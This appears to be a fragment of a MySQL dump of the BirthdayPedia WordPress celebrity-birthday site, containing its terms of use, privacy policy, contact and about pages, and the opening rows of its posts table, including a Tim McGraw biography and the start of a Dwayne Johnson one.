.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-534x413.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-620x385.jpg\";s:5:\"width\";i:620;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3782,526,'_thumbnail_id','657'),(3784,526,'_yoast_wpseo_primary_category',''),(3790,194,'td_wp_editor','<h2>BirthDayPedia.com Terms of Use</h2>\r\n*Your use of BirthDayPedia.com and its services, resources and content is subject to our Privacy Policy and our Terms and Conditions as follows:\r\n\r\nEntertainment and information only\r\n\r\nBirthDayPedia.com operates an online consulting service called Ask BirthDayPedia (the “Service”) for educational and entertainment purposes only. By using the Service, you expressly acknowledge and understand that there are risks and limitations associated with online consulting services.\r\n\r\nThe contents of Ask BirthDayPedia, such as text, graphics, images, and other material contained on the Ask BirthDayPediaSite (“Content”) are for informational and entertainment purposes only.\r\n\r\nNo management of content –\r\n\r\nYou expressly acknowledge that we are unable to directly manage the Service or edit, modify, screen, or otherwise review the Content posted by licensed Professionals. As a result, we do not have absolute control over the quality, safety, or legality of the answers that are provided through our services. You also expressly acknowledge that in the case where a licensed professional answers your questions a Professional-Client-Patient Relationship will NOT be established and that this service will not be able to diagnose, treat, or prescribe.\r\n\r\nNo endorsement of products or services by BirthDayPedia\r\n\r\nThe answers given are not endorsed by BirthDayPediaand are the responses of the individual giving them. If such answer includes an endorsement of a particular brand of product or service, such endorsement is given by the individual only and NOT BirthDayPedia.\r\n\r\nYour use of this site is at your own risk\r\n\r\nBirthDayPedia IS NOT RESPONSIBLE FOR ANY LOSS, INJURY, CLAIM, LIABILITY, OR DAMAGE RELATED TO YOUR USE OF THIS SITE OR ANY SITE LINKED TO THIS SITE, WHETHER FROM ERRORS OR OMISSIONS IN THE CONTENT OF OUR SITE OR ANY OTHER LINKED SITES, FROM THE SITE BEING DOWN, OR FROM ANY OTHER USE OF THIS SITE.\r\n\r\nYou agree to not use BirthDayPedia in order to:\r\n\r\n• upload, post, or otherwise transmit any Content that is unlawful, harmful, threatening, abusive, harassing, tortuous, defamatory, vulgar, obscene, libelous, invasive of another’s privacy, hateful, or racially, ethnically or otherwise objectionable;\r\n\r\n• harm minors in any way;\r\n\r\n• impersonate any person or entity, including, but not limited to, a BirthDayPedia official, forum leader, guide or host, or falsely state or otherwise misrepresent your affiliation with a person or entity;\r\n\r\n• forge headers or otherwise manipulate identifiers in order to disguise the origin of any Content transmitted through the Service or develop restricted or password-only access pages, or hidden pages or images (those not linked to from another accessible page);\r\n\r\n• upload, post, or otherwise transmit any Content that you do not have a right to transmit under any law or under contractual or fiduciary relationships (such as inside information, proprietary and confidential information learned or disclosed as part of employment relationships or under nondisclosure agreements);\r\n\r\n• upload, post, or otherwise transmit any Content that infringes any patent, trademark, trade secret, copyright, or other proprietary rights of any party;\r\n\r\n• upload, post, or otherwise transmit any unsolicited or unauthorized advertising, promotional materials, “junk mail,” “spam,” “chain letters,” “pyramid schemes,” or any other form of solicitation, except in those areas of the Service that are designated for such purpose;\r\n\r\n• upload, post, or otherwise transmit any material that contains software viruses or any other computer code, files or programs designed to interrupt, destroy or limit the functionality of any computer software or hardware or telecommunications equipment;\r\n\r\n• interfere with or disrupt the servers or networks connected to the BirthDayPedia site, or disobey any requirements, procedures, policies or regulations of networks connected to the site;\r\n\r\n• intentionally or unintentionally violate any applicable local, state, national or international law, including, but not limited to, regulations promulgated by the U.S. Securities and Exchange Commission, any rules of any national or other securities exchange, including, without limitation, the New York Stock Exchange, the American Stock Exchange or the NASDAQ, and any regulations having the force of law;\r\n\r\n• “stalk” or otherwise harass another;\r\n\r\n• collect or store personal data about other users;\r\n\r\n• promote or provide instructional information about illegal activities, promote physical harm or injury against any group or individual, or promote any act of cruelty to animals;\r\n\r\n• use your home page (or directory) as storage for remote loading or as a door or signpost to another home page; or\r\n\r\n• engage in commercial activities without the express written consent of BirthDayPedia. This includes, but is not limited to, the following activities:\r\n\r\no offering for sale any products or services;\r\n\r\no soliciting for advertisers or sponsors;\r\n\r\no conducting raffles or contests that require any type of entry fee;\r\n\r\no displaying a sponsorship banner of any kind, including those that are generated by banner or link exchange services\r\n\r\no displaying banners for services that provide cash or cash-equivalent prizes to users in exchange for hyperlinks to their websites.\r\n\r\nRights\r\n\r\nYou acknowledge that we acquire all Rights to use any posted materials as described above so that we do not violate any Rights you may have in materials you post. By submitting content to or through our sites, you grant us the non-exclusive right to reproduce, modify, and distribute it as we see fit in any medium and for any purpose in any form, media, or technology now known or later developed. You vouch that any material you submit does not violate, plagiarize, or infringe upon the right of any third party, including copyright, trademark, or proprietary rights. If non-original content is included in your posting, you must cite back to the content owner and attribute it.\r\n\r\nCopyrights and Copyright Agent\r\n\r\nBirthDayPedia respects the rights of all copyright holders. If you believe that your work has been copied and used on one of our Sites in a way that constitutes copyright infringement, please provide BirthDayPedia Copyright Agent the following information required by Section 512 of the Digital Millennium Copyright Act:\r\n\r\n• A physical or electronic signature of a person authorized to act on behalf of the owner of an exclusive right that is allegedly infringed;\r\n\r\n• Identification of the copyright work claimed to have been infringed, or, if multiple copyrighted works at a single on-line site are covered by a single notification, a representative list of such works at that site;\r\n\r\n• Identification of the material that is claimed to be infringing or to be the subject of infringing activity and that is to be removed or access to which is to be disabled, and information reasonably sufficient to permit us to locate the material;\r\n\r\n• Information reasonably sufficient to permit the service provider to contact the complaining party;\r\n\r\n• A statement that the complaining party has a good-faith belief that use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law; and\r\n\r\n• A statement that the information in the notification is accurate, and under penalty of perjury, that the complaining party is authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.\r\n\r\nBirthDayPedia Copyright Agent may be contacted at: Copyright Agent, BirthDayPedia , 245 West 19th St, New York, New York, 10011..\r\n\r\nWe appreciate the opportunity to serve you!\r\n\r\nIf you have any questions regarding this privacy policy statement or if you feel that this site has not followed its stated information policy, feel free to contact us. Our postal address is: 245 West 19th St, New York, New York, 10011, and we can be reached via e-mail here\r\n\r\nAdditionally, you may contact your state or local consumer protection office, The Direct Marketing Association’s Committee on Ethical Business Practices, the Better Business Bureau, or The Federal Trade Commission by phone at (202) FTC-HELP (202/382-4357) and online at www.ftc.gov.\r\n\r\nNote: This privacy policy applies to all of BirthDayPedia owned and operated websites and to BirthDayPedia’s other information gathering activities.\r\n\r\nBirthDayPedia complies with all the stringent standards of ethical conduct set forth by the Direct Marketing Association.'),(3791,194,'_yoast_wpseo_content_score','30'),(3792,188,'td_wp_editor','<strong>What information do you collect about me?</strong>\r\n\r\nBirthdayPedia collects personal identifying information (“PII”) from you only if you voluntarily submit such information to us on website(s) and through e-mail. We also collect PII during transactions, sponsored events, mobile marketing campaigns, and contests/sweepstakes. When visiting one of our online sites, we collect user-specific information on what pages are visited and volunteered information such as survey information and/or site registrations. PII includes your name, postal address, e-mail address, telephone and cell phone numbers, wireless service provider, and all other information you provide to us.\r\n\r\nWe may collect information about your interaction with BirthdayPedia sites and services. For example, we may use Web site analytics tools on our site to retrieve information from your browser, including the site you came from, the search engine(s) and the keywords you used to find our site, the pages you view within our site, your browser add-ons, and your browser’s width and height. We may also use technologies, such as cookies and web beacons (described below) to collect information about the pages you view, the links you click and other actions you take on our sites and services. Additionally, we may collect certain standard information that your browser sends to every website you visit, such as your IP address, browser type and language, access times and referring Web site addresses.\r\n\r\nWhen you receive newsletters or promotional e-mail from BirthdayPedia, we may use web beacons (described below), customized links or similar technologies to determine whether the e-mail has been opened and which links you click in order to provide you more focused e-mail communications or other information.\r\n\r\nIn order to offer you a more consistent and personalized experience in your interactions with BirthdayPedia, information collected through one BirthdayPedia site or service may be combined with information obtained through other BirthdayPedia sites or services. We may also supplement the information we collect with information obtained from other companies.\r\n\r\n<strong>What’s in it for me?</strong>\r\n\r\nPlenty! The information we collect allows us to customize the content and/or layout of our page for each visitor. Plus, it enables us to notify you about updates to our Website… contact you with special offers of interest… and customize your Website experience. In addition, information is shared with reputable organizations that may contact you with special offers of possible interest.\r\n\r\n<strong>Your Privacy Rights</strong>\r\n\r\nFrom time to time, we make your PII available to other reputable businesses whose products or services might be of value to you. If you do not want us to share your PII with other companies or organizations, please let us know by emailing us at here .\r\n\r\n<strong>Transfers of Information for Legal Purposes</strong>\r\n\r\nBirthdayPedia may need to disclose certain information to comply with a legal requirement, such as a law, regulation, court order, subpoena, or search warrant, in the course of a legal proceeding or in response to a law enforcement agency request. If there is a change of control in BirthdayPedia business (whether by merger, sale, or otherwise) or a sale or transfer of its assets, customer information could be sold or transferred as part of that transaction and your PII potentially used by the Purchaser or other recipient of said customer information.\r\n\r\nYou acknowledge that BirthdayPedia is located in the United States of America (“U.S.”) and will process and store your information in the U.S., and that as a result, U.S. governments, courts or law enforcement or regulatory agencies may be able to obtain disclosure of your information through the laws of the U.S.\r\n\r\n<strong>Mobile Devices/Third Party Fees</strong>\r\n\r\nFrom time to time, BirthdayPedia may deploy mobile marketing campaigns and may allow you to register for services that involve messages and/or e-mails being sent to your mobile device. You are responsible for obtaining access to the mobile device services and that access may involve third-party fees, including mobile carrier, text messaging, or airtime charges. You are solely responsible for those fees, including any and all fees associated with the delivery of the messages, e-mails or other materials to your mobile device. Please consult your mobile service provider’s pricing plan prior to registering for any such service to determine the charges for sending and receiving text messages from/to your mobile device. You will be given the opportunity to opt-out of receiving text messages or emails to your mobile device at the time you register and with each message or email you receive.\r\n\r\nMobile marketing campaigns may involve your sending an e-mail from your mobile device to BirthdayPedia or a third-party campaign operator. An e-mail or other response will then be sent to your mobile device. Opting to participate in a campaign is 100% your choice. When you engage in these mobile marketing campaigns, BirthdayPedia and the third-party campaign operator collect your cell phone number, the name of your wireless service provider, images that you send using your cell phone as part of the campaign, and other relevant information.\r\n\r\n<strong>What are “cookies” and what do they do for me?</strong>\r\n\r\nIn order to provide better service when you return to our site, BirthdayPedia may use cookies to store your preferences and information about such things as items added to your shopping cart, purchases you have made with us, what pages you visit, and past activity at a site. “Cookies” are tiny pieces of information stored by your browser on your computer’s hard drive. Cookies are also used to ensure that you are not repeatedly sent the same banner ads and to customize Webpage content based on your browser type (Netscape or Microsoft Explorer, for example). Most browsers are initially set to accept cookies.\r\n\r\nIf you want to disable cookies, there is a simple procedure in most Internet browsers that allows you to turn off cookies. Please remember, however, that cookies may be required to allow you to use certain features of our sites.\r\n\r\nWe use third-party advertising companies to serve ads and collect information when users visit our site. These companies may use information (not including your name, address, email address or telephone number) about your visits to this and other websites in order to provide advertisements on our site, other websites and other forms of media about goods and services of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, check out<a href=\"http://www.networkadvertising.org/managing/opt_out.asp\">http://www.networkadvertising.org/managing/opt_out.asp</a> .\r\n\r\n<strong>Use of Web Beacons</strong>\r\n\r\nBirthdayPedia Website pages may contain electronic images known as Web beacons – sometimes called single-pixel gifs – that may be used to assist in delivering cookies on our sites and allow us to count users who have visited those pages and to deliver co-branded services. We may include Web beacons in promotional e-mail messages or our newsletters in order to determine whether messages have been opened and acted upon.\r\n\r\nBirthdayPedia may also employ Web beacons from third parties in order to help us compile aggregated statistics regarding the effectiveness of our promotional campaigns or other operations of our sites.\r\n\r\n<strong>Links</strong>\r\n\r\nBirthdayPedia sites may, on occasion, contain links to other sites with information gathering practices different from our own. Visitors should consult privacy policies for all other sites, as BirthdayPedia has no control over information submitted to or collected by such third parties.\r\n\r\nBirthdayPedia sites sometimes offer contest, sweepstakes, or promotions sponsored or co-sponsored by third parties. These third parties may obtain PII that visitors voluntarily submit to participate in the contest, sweepstakes, or promotion. BirthdayPedia has no control over the third-party sponsor’s use of this information. The BirthdayPedia site will notify you at the time of requesting PII if third-party sponsors will be provided with such information.\r\n\r\n<strong>Changes…</strong>\r\n\r\nBirthdayPedia may need to change this privacy policy from time to time in order to address new issues, evolving technologies, changes on our sites, or business practices. BirthdayPedia will post those changes so you will always know what information we gather and how we might use that information. Please refer back to this policy regularly.\r\n\r\n<strong>Rules for Submissions and Messages</strong>\r\n\r\nResponsibility for what is posted in the discussion groups or other public forums lies with each user – you alone are responsible for the content of your messages and the consequences of any such messages. We cannot and do not review every submission a user may make. We neither endorse nor guarantee the accuracy or propriety of any submission. We do, however, reserve the right but do not assume the obligation to restrict or prohibit your use of our sites if we believe you are violating any of the terms of the agreement and to remove, edit, or relocate any submission as we see fit whether for legal or other reasons.\r\n\r\n<strong>Member Conduct</strong>\r\n\r\nYou understand that all information, data, text, software, music, sound, photographs, graphics, video, messages or other materials (“Content”), whether publicly posted or privately transmitted, are the sole responsibility of the person from which such Content originated. This means that you, and not BirthdayPedia, are entirely responsible for all Content that you upload, post, or otherwise transmit. BirthdayPedia does not control the Content posted and, as such, does not guarantee the accuracy, integrity, or quality of such Content. You understand that by using a BirthdayPedia site, you may be exposed to Content that is offensive, indecent or objectionable.\r\n\r\nBirthdayPedia Copyright Agent may be contacted at: Copyright Agent, BirthdayPedia, 245 West 19th St, New York, New York, 10011.\r\n\r\n<strong>We appreciate the opportunity to serve you!</strong>\r\n\r\nIf you have any questions regarding this privacy policy statement or if you feel that this site has not followed its stated information policy, feel free to contact us. Our postal address is: 245 West 19th St, New York, New York, 10011.. and we can be reached via e-mail here\r\n\r\nAdditionally, you may contact your state or local consumer protection office, The Direct Marketing Association’s Committee on Ethical Business Practices, the Better Business Bureau, or The Federal Trade Commission by phone at (202) FTC-HELP (202/382-4357) and online at www.ftc.gov.\r\n\r\nNote: This privacy policy applies to all of BirthdayPedia owned and operated websites and to BirthdayPedia other information gathering activities.'),(3793,188,'_yoast_wpseo_content_score','30'),(3794,417,'td_homepage_loop','a:1:{s:5:\"limit\";s:2:\"10\";}'),(3795,417,'td_wp_editor','<p style=\"text-align: center;\"><a href=\"http://birthdaypedia.com/wp-content/uploads/2015/07/iStock_000008906483_Small.jpg\"><img class=\"wp-image-399 aligncenter\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/07/iStock_000008906483_Small.jpg\" alt=\"iStock_000008906483_Small\" width=\"700\" height=\"416\" /></a></p>\r\n<p style=\"text-align: left;\"><span style=\"color: #ff0000;\">We love to receive emails! If you have a question, concern or comment, please feel free to contact us below! You can also use the form to reach out to our sales team regarding advertising on the site.</span></p>\r\n<p style=\"text-align: center;\">[contact-form-7 id=\"186\" title=\"Contact form 1\"]</p>'),(3796,417,'_yoast_wpseo_focuskw_text_input','contact us'),(3797,417,'_yoast_wpseo_content_score','60'),(3798,380,'td_wp_editor','<p style=\"text-align: center;\"><a href=\"http://birthdaypedia.com/wp-content/uploads/2015/10/hed.jpg\"><img class=\"alignnone wp-image-402\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/hed.jpg\" alt=\"hed\" width=\"768\" height=\"243\" /></a></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">They say celebrities are just like us, but we know that\'s not really true, is it? No... it\'s not, But, most of us do have something in common with those A-listers we\'re always watching on the big screen and elsewhere: <span style=\"color: #ff0000;\">our birthdays</span>.</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">Here at <span style=\"color: #00ccff;\">BirthdayPedia</span>, we aim to be the one-stop place where you can find a number of celebrities born on your birthday, your mom\'s birthday, and even your dog\'s birthday. You\'ll also find some fun information regarding your favorite stars, politicians and historical figures.</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">You can find out if you share your birthday with Justin Timberlake, Vladimir Putin and Ghandi. Or you can learn about President Obama\'s early years, who Matt Damon is married to, and Carole Lombard\'s rise to fame.</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">So let us officially welcome you to <span style=\"color: #00ccff;\">BirthdayPedia</span>, where the birthday celebrations never stop.</span></h3>\r\n<h1 style=\"text-align: center;\"><strong><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"http://birthdaypedia.com/contact-us/\" target=\"_blank\">Contact us</a></span>, we really want to hear from you! </strong></h1>'),(3799,380,'_yoast_wpseo_focuskw_text_input','about us'),(3800,380,'_yoast_wpseo_content_score','60'),(3801,443,'td_mega_menu_cat',''),(3802,443,'td_mega_menu_page_id',''),(3803,440,'td_mega_menu_cat',''),(3804,440,'td_mega_menu_page_id',''),(3805,442,'td_mega_menu_cat',''),(3806,442,'td_mega_menu_page_id',''),(3807,20,'_wpb_post_custom_css','.td-main-page-wrap {\r\npadding-top: 15px;\r\n}'),(3813,550,'tps_options','a:4:{s:7:\"enabled\";s:6:\"global\";s:21:\"nav_vertical_position\";s:6:\"global\";s:23:\"nav_hide_on_first_slide\";b:0;s:23:\"slide_loading_mechanism\";s:6:\"global\";}'),(3815,214,'tps_options','a:4:{s:7:\"enabled\";s:6:\"global\";s:21:\"nav_vertical_position\";s:6:\"global\";s:23:\"nav_hide_on_first_slide\";b:0;s:23:\"slide_loading_mechanism\";s:6:\"global\";}'),(3817,212,'tps_options','a:4:{s:7:\"enabled\";s:6:\"global\";s:21:\"nav_vertical_position\";s:6:\"global\";s:23:\"nav_hide_on_first_slide\";b:0;s:23:\"slide_loading_mechanism\";s:6:\"global\";}'),(3819,499,'tps_options','a:4:{s:7:\"enabled\";s:6:\"global\";s:21:\"nav_vertical_position\";s:6:\"global\";s:23:\"nav_hide_on_first_slide\";b:0;s:23:\"slide_loading_mechanism\";s:6:\"global\";}'),(3823,213,'tps_options','a:4:{s:7:\"enabled\";s:6:\"global\";s:21:\"nav_vertical_position\";s:6:\"global\";s:23:\"nav_hide_on_first_slide\";b:0;s:23:\"slide_loading_mechanism\";s:6:\"global\";}'),(3824,213,'_yoast_wpseo_primary_category','520'),(3825,213,'_yoast_wpseo_focuskw_text_input','Gerald McRaney'),(3826,213,'_yoast_wpseo_content_score','60'),(3828,215,'tps_options','a:4:{s:7:\"enabled\";s:6:\"global\";s:21:\"nav_vertical_position\";s:6:\"global\";s:23:\"nav_hide_on_first_slide\";b:0;s:23:\"slide_loading_mechanism\";s:6:\"global\";}'),(3829,215,'_yoast_wpseo_primary_category','517'),(3830,215,'_yoast_wpseo_focuskw_text_input','Hayden Panettiere'),(3831,215,'_yoast_wpseo_content_score','30'),(3833,236,'tps_options','a:4:{s:7:\"enabled\";s:6:\"global\";s:21:\"nav_vertical_position\";s:6:\"global\";s:23:\"nav_hide_on_first_slide\";b:0;s:23:\"slide_loading_mechanism\";s:6:\"global\";}'),(3834,236,'_yoast_wpseo_primary_category','517'),(3835,236,'_yoast_wpseo_focuskw_text_input','Rupert Grint'),(3836,236,'_yoast_wpseo_content_score','30'),(3839,380,'ampforwp-amp-on-off','default'),(3840,422,'ampforwp-amp-on-off','default'),(3841,390,'ampforwp-amp-on-off','default'),(3842,417,'ampforwp-amp-on-off','default'),(3843,20,'ampforwp-amp-on-off','default'),(3844,188,'ampforwp-amp-on-off','default'),(3845,2,'ampforwp-amp-on-off','default'),(3846,194,'ampforwp-amp-on-off','default');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts`
--
DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext NOT NULL,
`post_title` text NOT NULL,
`post_excerpt` text NOT NULL,
`post_status` varchar(20) NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) NOT NULL DEFAULT 'open',
`ping_status` varchar(20) NOT NULL DEFAULT 'open',
`post_password` varchar(255) NOT NULL DEFAULT '',
`post_name` varchar(200) NOT NULL DEFAULT '',
`to_ping` text NOT NULL,
`pinged` text NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`ID`),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`),
KEY `post_name` (`post_name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=658 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts`
--
LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (2,1,'2015-04-27 23:02:47','2015-04-27 23:02:47','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href=\"https://birthdaypedia.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','Sample Page','','publish','open','open','','sample-page','','','2015-04-27 23:02:47','2015-04-27 23:02:47','',0,'http://birthdaypedia.wpengine.com/?page_id=2',0,'page','',0),(4,2,'2015-05-01 09:36:00','2015-05-01 09:36:00','<h2>In the Beginning</h2>\r\nThe beginnings of <a href=\"https://en.wikipedia.org/wiki/Tim_McGraw\" target=\"_blank\">country legend Tim McGraw</a> were anything but legendary. If anything they were actually quite normal. Tim McGraw was born Samuel Timothy McGraw in Delhi Lousiana to Betty Ann D’Agostino and Frank Edwin McGraw Jr who at the time was a star pitcher for the New York Mets. In the year 1966, Frank McGraw, also known as ‘Tug’ was a pitcher for the Jacksonville Suns and lives above Betty D’Agostino who at the time was still attending high school. Though they had a seemingly good relationship, D’Agostino’s parents were displeased when she became pregnant and sent her to live with relatives.<strong> </strong>\r\n\r\nTim was raised by his mother in Start, Louisiana, and for the first years of his life believed himself to be the biological son of Horace Smith, his stepfather. This lasted until age 11 when McGraw searched his mother’s closet looking for Christmas presents and came across his birth certificate. After this event, his mother told him the truth, and took him to see his biological father. Unfortunately, ‘Tug’ McGraw would deny paternity for the next seven years, until Tim turned eighteen and the family resemblance became too much to deny.\r\n\r\nThroughout his childhood, McGraw had a love for competitive sports, baseball in particular, though he had no knowledge of his biological father’s history in the sports community. In addition to that he was a member of the <a href=\"https://www.ffa.org/home\" target=\"_blank\">FFA</a> (Future Farmers of America). He attended college at the University of Louisiana, then known a the Northeast Louisiana University on a baseball scholarship, becoming a member of Pi Kappa Alpha. He learned to play guitar during college, though he was apparently bad enough at it that his roommates were constantly prompted to hide his guitar.\r\n\r\nIn 1987, Betty, his mother, returned to <a href=\"http://www.visitjacksonville.com/\" target=\"_blank\">Jacksonville Florida</a>, and he went with her to attend Florida Community College for a single term. In 1989 after the death of Keith Whitley, his hero, McGraw dropped out of college and made his way to Nashville where he would pursue a career in music.\r\n\r\nOne year later, in 1990, McGraw caught the attention of <a href=\"http://www.curb.com/\" target=\"_blank\">Curb Records</a>, having cut a demo and giving the single to his father. Tug happened to be friends with a record executive at Curb, and was able to get McGraw a session with label executives. After hearing the single they immediately signed him to a recording contract, though many believe that the single was terrible, and McGraw was signed simply due to the fame of his father. If that is truly the case, then it is an investment that paid off.\r\n\r\nNone of Tim Mcgraw’s early work made it to the top 40, and his debut album did not chart at all. The days to come however, would be much more lucrative.\r\n<h2>Career Accomplishments</h2>\r\nIn 1994, the best selling country album would be ‘Not a Moment Too Soon’ which was considerably more successful than his first album. In fact, he manage to rock the proverbial boat with the first single ‘Indian Outlaw’ This song was often thought to be racist, or at the very least, patronizing to Native Americans, and as a result some radio stations actually refused to play it. The controversy actually managed to fuel sales, pushing the single to the top of the charts, making it McGraw’s first top ten.\r\n\r\nThe second single from his Album, ‘Don’t take the Girl’ became his first Number 1 country hit, also reaching number 17 on the Hot 100. This single finally helped to establish him as a rugged county singer that people could actually care about. From here on out, everything is history. His 1995 single Refried Dreams fueled an album that would sell more than 6 million copies and even topped the Billboard 200 – a lifetime achievement for many country singers.\r\n\r\nTim McGraw has also had a lucrative acting career, first appearing on the Jeff Foxworthy Show in 1997. In addition to that he played a sheriff in the independent film Black Cloud. He has also played in movies such as Friday Night Lights, and Flicka. In 2009 McGraw played Sean Tuphy in The Blind Side, based on the true story of Michael Oher. Having played in several other films, McGraw has received critical acclaim for each and every one of his roles, earning himself a solid foothold in his new acting career.\r\n<h3>McGraw’s current discography includes:</h3>\r\nTim McGraw -- 1993\r\n\r\nNot a Moment Too Soon -- 1994\r\n\r\nAll I Want -- 1995\r\n\r\nEverywhere -- 1997\r\n\r\nA Place in the Sun -- 1999\r\n\r\nSet This Circus Down -- 2001\r\n\r\nTim McGraw and The Dancehall Doctors -- 2002\r\n\r\nLive Like You Were Dying --2004\r\n\r\nLet It Go --2007\r\n\r\nSouthern Voice -- 2009\r\n\r\nEmotional Traffic -- 2012\r\n\r\nTwo Lanes of Freedom -- 2013\r\n\r\nSundown Heaven Town -- 2014\r\n<h2>Most Known For</h2>\r\nTim McGraw is most known for his country music career having topped the charts multiple times for the past 20+ years. In spite of this, one of his most well known moves as of late is his desire to run for public office in the future. As a democrat, Tim McGraw has expressed interest in running for Senate, or possibly Governor of Tennessee, the state from which he comes. In addition to that he has come out as a strong supporter of former president Bill Clinton, and revealed his support for Barack Obama in 2008.\r\n\r\nMcGraw is married to fellow country singer <a href=\"http://en.wikipedia.org/wiki/Faith_Hill\">Faith Hill</a>. Together, they have three daughters: Gracie Katherine (b. 1997), Maggie Elizabeth (b. 1998) and Audrey Caroline (b. 2001).<a href=\"http://en.wikipedia.org/wiki/Tim_McGraw#cite_note-74\"><sup>[74]</sup></a>\r\n<h2>Current Personal Life</h2>\r\nCurrently, McGraw is married to Faith Hill, a fellow country singer, and they have three daughters together.\r\n\r\n \r\n<h2>Where Are They Now</h2>\r\nMarried to Faith Hill, Tim McGraw is still touring and still recording albums. Currently, Tim McGraw has been schedule to appear at the 40<sup>th</sup> anniversary of Glen Campbell’s ‘Rhinestone Cowboy’ hit, alongside Dolly Parton and Darius Rucker.\r\n\r\nImage Credit: istockphoto.com\r\n\r\n ','Tim McGraw','','publish','open','open','','country-legend-tim-mcgraw','','','2015-10-14 14:36:15','2015-10-14 14:36:15','',0,'http://birthdaypedia.wpengine.com/?p=4',0,'post','',0),(5,2,'2015-06-23 19:50:56','2015-06-23 19:50:56','','Country Legend Tim McGraw','','inherit','open','open','','country-legend-tim-mcgraw','','','2015-06-23 19:51:04','2015-06-23 19:51:04','',4,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Country-Legend-Tim-McGraw.jpg',0,'attachment','image/jpeg',0),(6,2,'2015-05-04 09:53:42','2015-05-04 09:53:42','<h2>In the Beginning</h2>\r\nOne May 2, 1972, Dwayne Johnson was born in Hayward, California to Ata Johnson. He came from a family of wrestlers, his father being Rocky Johnson, and his maternal grandfather, Peter Maivia known as professional wrestler ‘High Chief’. In addition to that, his maternal grandmother was one of the few female professional promoters for the sport (Liv Maivia).\r\n\r\nThough he was born in California, he spent some of his early life in Auckland, New Zealand, attending Richmond Road Primary School before making a return to the United States with his parents. The 10<sup>th</sup> grade was spent at President William McKinley High School in Honolulu, but the 11<sup>th</sup> was spent at Freedom High School in Bethlehem, Pennsylvania due to a change in his father’s job that made relocation a necessity. He played football at Freedom High school, and was also involved in their track and field and wrestling teams.\r\n\r\nDue to his performance on the high school football team, Dwayne received several offers from Division I collegiate programs, but decided to pursue a full scholarship to the University of Miami. His position was defensive tackle, and in 1991, he played for the Miami Hurricanes. Unfortunately, an injury took him out of the game, and he would see his position overtaken by Warren Snap, a future NFL star. He still attended Miami, and there he met his future wife, Dany Garcia, who would become a member of the Board of Trustees.\r\n\r\nDwayne Johnson would graduate from Miami in 1995, earning a Bachelor of General Studies degree in the fields of both criminology and physiology. He did make an attempt to return to football, joining the Calgary Stampeders of the Canadian Football League in 1995. Though he was on the practice roster, he was cut just two months into the season.\r\n<h2>Career Accomplishments</h2>\r\nDwayne Johnson’s father, grandfather, and many of his uncles were in the professional wrestling scene, and at some point, Johnson himself determined that he too should become a wrestler. His father was not in favor of it at the start, but eventually agreed to train him. Then, Pat Patterson was able to get Johnson a few tryout matches with the World Wrestling Federation in 1996, where under his real name 